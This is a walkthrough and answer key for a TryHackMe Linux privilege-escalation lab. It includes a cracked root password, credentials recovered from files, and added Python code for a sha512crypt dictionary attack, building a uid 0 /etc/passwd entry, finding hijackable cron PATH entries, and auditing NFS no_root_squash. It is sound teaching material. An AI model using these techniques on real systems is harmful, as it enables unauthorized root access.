THM | Linux PrivEsc
Shells and Privilege Escalation | Linux PrivEsc | Summary:
This series of walkthroughs aims to help complete beginners finish the Complete Beginner path on the TryHackMe website. It is based on the learning content provided in the Linux PrivEsc room.
Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather serve as supplementary material for those who are stuck and need additional guidance.
01 | Deploy the Vulnerable Debian VM
Question 1: Deploy the machine and login to the "user" account using SSH.
No answer needed
Question 2: Run the "id" command. What is the result?
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
02 | Service Exploits
Question 1: Read and follow along with the above.
No answer needed
03 | Weak File Permissions - Readable /etc/shadow
Question 1: What is the root user's password hash?
$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0
Question 2: What hashing algorithm was used to produce the root user's password hash?
sha512crypt
Question 3: What is the root user's password?
password123
04 | Weak File Permissions - Writable /etc/shadow
Question 1: Read and follow along with the above.
No answer needed
05 | Weak File Permissions - Writable /etc/passwd
Question 1: Run the "id" command as the newroot user. What is the result?
uid=0(root) gid=0(root) groups=0(root)
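Added example covering tasks 03, 04 and 05 above: it identifies the scheme of a hash taken from a readable /etc/shadow from its $id$ prefix, verifies a candidate password against it with a pure-hashlib sha512crypt (so the cracked answer can be confirmed without john or hashcat), and builds the uid 0 entry you would append to a writable /etc/passwd (or the replacement hash for a writable /etc/shadow). This is not code from the room or from this walkthrough; only the root hash is the room's, while the other shadow fields, the daemon line, the newroot password and the salt are constructed.

```python
import hashlib
import re

# Added example, not code from the room or this walkthrough. Only the root hash is
# taken from the room; the remaining shadow fields, the daemon line, and the
# password and salt used for newroot below are constructed.
SHADOW_SAMPLE = """\
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
"""

# $id$ prefixes from crypt(5).
SCHEMES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
           "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def parse_shadow(text):
    """Map user -> second (hash) field of each /etc/shadow line."""
    rows = (line.split(":") for line in text.splitlines() if ":" in line)
    return {row[0]: row[1] for row in rows}


def identify_scheme(h):
    """Name the scheme from the prefix; '*' or '!' means no password login for the account."""
    if not h or h[0] in "*!":
        return "locked"
    return next((name for prefix, name in SCHEMES.items() if h.startswith(prefix)), "unknown")


def _b64_from_24bit(b2, b1, b0, n):
    """crypt(3)'s base64 variant: little-endian 6-bit groups of a 24-bit word."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = ""
    for _ in range(n):
        out, w = out + B64[w & 0x3F], w >> 6
    return out


def sha512crypt(password, salt, rounds=5000):
    """The glibc sha512crypt algorithm (Drepper's 'Unix crypt using SHA-256 and SHA-512')."""
    pw, salt = password.encode(), salt.encode()[:16]
    n = len(pw)
    b = hashlib.sha512(pw + salt + pw).digest()             # digest B
    a = hashlib.sha512(pw + salt)                            # digest A
    a.update((b * (n // 64 + 1))[:n])
    i = n
    while i:                                                 # one chunk per bit of len(pw)
        a.update(b if i & 1 else pw)
        i >>= 1
    da = a.digest()
    p = (hashlib.sha512(pw * n).digest() * (n // 64 + 1))[:n]
    s = hashlib.sha512(salt * (16 + da[0])).digest()[:len(salt)]
    c = da
    for r in range(rounds):                                  # the slow part: chained SHA-512s
        h = hashlib.sha512(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    out = ""
    for k in range(21):                                      # glibc's byte permutation
        i0, i1, i2 = k, k + 21, k + 42
        t = ((i0, i1, i2), (i1, i2, i0), (i2, i0, i1))[k % 3]
        out += _b64_from_24bit(c[t[0]], c[t[1]], c[t[2]], 4)
    out += _b64_from_24bit(0, 0, c[63], 2)
    prefix = "$6$" if rounds == 5000 else "$6$rounds=%d$" % rounds
    return prefix + salt.decode() + "$" + out


def verify(password, h):
    """True if password reproduces h; honours an explicit rounds=N$ field."""
    m = re.match(r"^\$6\$(?:rounds=(\d+)\$)?([^$]{1,16})\$", h)
    if not m:
        raise ValueError("not a sha512crypt hash")
    rounds = int(m.group(1)) if m.group(1) else 5000
    return sha512crypt(password, m.group(2), rounds) == h


def crack(h, wordlist):
    """Dictionary attack: the first candidate that verifies, else None."""
    return next((w for w in wordlist if verify(w, h)), None)


def build_passwd_entry(user, password, salt, shell="/bin/bash"):
    """A uid 0 / gid 0 /etc/passwd line carrying its own hash, as for newroot in task 05.
    The hash contains '$' characters, so quote the line when appending it from a shell."""
    return "%s:%s:0:0:%s:/root:%s" % (user, sha512crypt(password, salt), user, shell)


ROOT_HASH = parse_shadow(SHADOW_SAMPLE)["root"]

if __name__ == "__main__":
    print(identify_scheme(ROOT_HASH), crack(ROOT_HASH, ["root", "toor", "password123"]))
    print(build_passwd_entry("newroot", "s3cret", "abcdefgh"))
```

Running the block prints the scheme and the recovered root password, then the newroot line. The same sha512crypt function produces the replacement hash for the writable /etc/shadow task; the only difference is which file the result goes into.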
06 | Sudo - Shell Escape Sequences
Question 1: How many programs is "user" allowed to run via sudo?
11
Question 2: One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?
apache2
Question 3: Consider how you might use this program with sudo to gain root privileges without a shell escape sequence.
No answer needed
07 | Sudo - Environment Variables
Question 1: Read and follow along with the above.
No answer needed
08 | Cron Jobs - File Permissions
Question 1: Read and follow along with the above.
No answer needed
09 | Cron Jobs - PATH Environment Variable
Question 1: What is the value of the PATH variable in /etc/crontab?
/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
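Added example for the PATH task above, not code from the room: it reads a system crontab the way cron does (the crontab's own PATH line, not the caller's environment), lists the jobs whose command is a bare name rather than an absolute path, and reports the first PATH directory the current user could write a same-named file into before cron reaches the real binary. The PATH line is the room's value; the job lines, the @reboot entry and the writability callbacks used for offline testing are constructed.

```python
import os
import re

# Added example, not code from the room. The PATH line is the value the room's
# /etc/crontab sets; the job lines and the offline writable/exists callbacks are constructed.
CRONTAB_SAMPLE = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * root backup.sh
* * * * * root /usr/local/bin/rotate-logs.sh
@reboot   root cleanup.sh
"""

CRON_DEFAULT_PATH = ["/usr/bin", "/bin"]      # what cron uses when the file sets no PATH


def crontab_path(text):
    """PATH as cron will see it: the crontab's own PATH line, never the caller's environment."""
    for line in text.splitlines():
        m = re.match(r'^\s*PATH\s*=\s*"?([^"]*)"?\s*$', line)
        if m:
            return m.group(1).split(":")
    return CRON_DEFAULT_PATH


def jobs(text):
    """(user, command) for each job line of a system crontab, including @reboot-style lines."""
    found = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+\s*=", s):
            continue                      # blank, comment or variable assignment
        special = s.startswith("@")       # @reboot/@daily: one schedule field instead of five
        parts = s.split(None, 2) if special else s.split(None, 6)
        if len(parts) == (3 if special else 7):
            found.append((parts[-2], parts[-1]))
    return found


def hijackable(text, writable=None, exists=None):
    """Jobs whose command is a bare name that cron resolves through a PATH directory the
    caller can write to before it reaches the genuine binary. `writable` and `exists`
    default to the live filesystem and can be replaced for offline testing."""
    writable = writable or (lambda d: os.access(d, os.W_OK))
    exists = exists or os.path.isfile
    findings = []
    for user, command in jobs(text):
        name = command.split()[0]
        if name.startswith("/"):
            continue                      # absolute path: PATH is not consulted
        for d in crontab_path(text):
            candidate = os.path.join(d, name)
            if writable(d):
                findings.append((user, name, candidate))
                break
            if exists(candidate):
                break                     # the genuine binary is found first, so no hijack
    return findings


if __name__ == "__main__":
    with open("/etc/crontab") as f:
        for user, name, where in hijackable(f.read()):
            print("%s runs %s by bare name; %s is writable first" % (user, name, where))
```

On the room's VM the first PATH entry is /home/user, which the low-privileged user owns, so any job written as a bare command name is reported with a candidate path inside that directory. The `exists` check matters on hardened hosts: a writable directory listed after the directory holding the real binary cannot be used, because cron stops at the first match.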
10 | Cron Jobs - Wildcards
Question 1: Read and follow along with the above.
No answer needed
11 | SUID / SGID Executables - Known Exploits
Question 1: Read and follow along with the above.
No answer needed
12 | SUID / SGID Executables - Shared Object Injection
Question 1: Read and follow along with the above.
No answer needed
13 | SUID / SGID Executables - Environment Variables
Question 1: Read and follow along with the above.
No answer needed
14 | SUID / SGID Executables - Abusing Shell Features (#1)
Question 1: Read and follow along with the above.
No answer needed
15 | SUID / SGID Executables - Abusing Shell Features (#2)
Question 1: Read and follow along with the above.
No answer needed
16 | Passwords & Keys - History Files
Question 1: What is the full mysql command the user executed?
mysql -h somehost.local -uroot -ppassword123
17 | Passwords & Keys - Config Files
Question 1: What file did you find the root user's credentials in?
/etc/openvpn/auth.txt
18 | Passwords & Keys - SSH Keys
Question 1: Read and follow along with the above.
No answer needed
19 | NFS
Question 1: What is the name of the option that disables root squashing?
no_root_squash
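Added example for the NFS task above, not code from the room: a parser for /etc/exports that works out how each export maps a client's uid 0 and flags the shares exported read-write with no_root_squash, which is the condition that lets a file created as root on the client keep root ownership (and its SUID bit) on the server. The exports file is constructed; the room only names the option.

```python
import re

# Added example, not code from the room. The exports file below is constructed; the room
# only names the option (no_root_squash) that makes an NFS share dangerous.
EXPORTS_SAMPLE = """\
# /etc/exports: the path, then one host(options) spec per client
/srv/share   *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/public  10.0.0.0/24(ro,sync,root_squash)
/home        192.168.1.0/24(rw,sync) *(ro)
"""


def parse_exports(text):
    """(path, client, options) for every client spec; an omitted client means every host."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.match(r"^([^(]*)(?:\((.*)\))?$", spec)
            if not m:
                raise ValueError("malformed client spec: %r" % spec)
            client = m.group(1) or "*"
            options = m.group(2).split(",") if m.group(2) else []
            entries.append((path, client, options))
    return entries


def squash_mode(options):
    """How the server maps a client's uid 0: 'root' (the default, root becomes the anonymous
    user), 'all' (every client uid is squashed) or 'none' (no_root_squash: root stays root)."""
    mode = "root"
    for opt in options:                   # later options override earlier ones
        if opt == "no_root_squash":
            mode = "none"
        elif opt == "root_squash":
            mode = "root"
        elif opt == "all_squash":
            mode = "all"
    return mode


def risky_exports(text):
    """(path, client, insecure) for exports a client root can write to unsquashed.
    The third field says whether `insecure` also accepts mounts from unprivileged ports."""
    risky = []
    for path, client, options in parse_exports(text):
        if squash_mode(options) == "none" and "rw" in options:
            risky.append((path, client, "insecure" in options))
    return risky


if __name__ == "__main__":
    with open("/etc/exports") as f:
        for path, client, insecure in risky_exports(f.read()):
            print("%s exported rw to %s with no_root_squash%s" % (path, client, ", insecure" if insecure else ""))
```

The fix on the server side is to drop no_root_squash (root_squash is the default, so simply removing the option is enough) or to use all_squash for shares that should never carry uid-specific files. On the client side, the same parser run against `showmount -e` output would need adapting, because showmount does not print the options; the options are only visible in the server's /etc/exports.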
20 | Kernel Exploits
Question 1: Read and follow along with the above.
No answer needed
21 | Privilege Escalation Scripts
Question 1: Experiment with all three tools, running them with different options. Do all of them identify the techniques used in this room?
No answer needed